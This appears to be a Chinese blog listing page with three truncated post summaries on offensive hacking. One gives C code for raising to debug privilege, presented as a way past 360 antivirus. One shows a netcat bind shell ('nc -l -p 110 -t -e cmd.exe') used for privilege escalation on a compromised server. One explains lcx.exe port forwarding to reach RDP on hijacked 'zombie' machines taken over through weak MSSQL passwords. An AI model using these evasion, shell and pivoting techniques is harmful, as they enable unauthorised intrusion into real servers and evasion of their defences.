摘要:
/*————————————————————————————————*///过360云查杀的代码void RaiseToDebugP(){HANDLE hToken;HANDLE hProcess = GetCurrentProcess();if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ){ TOKEN_PRIVILEGES tkp; if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0]. 阅读全文
摘要:
环境说明: Server-U 不可利用 pcAnywhere没有安装提权思路: 上传NC,进行反弹连接。命令说明:nc -l -p 110 -t -e c:\winnt\system32\cmd.exe-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向C:\RECYCLER\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e c:\winnt\system32\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e C:\RECYCLER\cmd.exe接下来留给我们的空间就比较充足了,我们可以添加 阅读全文
摘要:
lcx.exe的使用方法以前抓肉鸡都是通过1433弱口令,然后..但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.用法:如在本机B上监听-listen513389,在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。例:现在有一 阅读全文
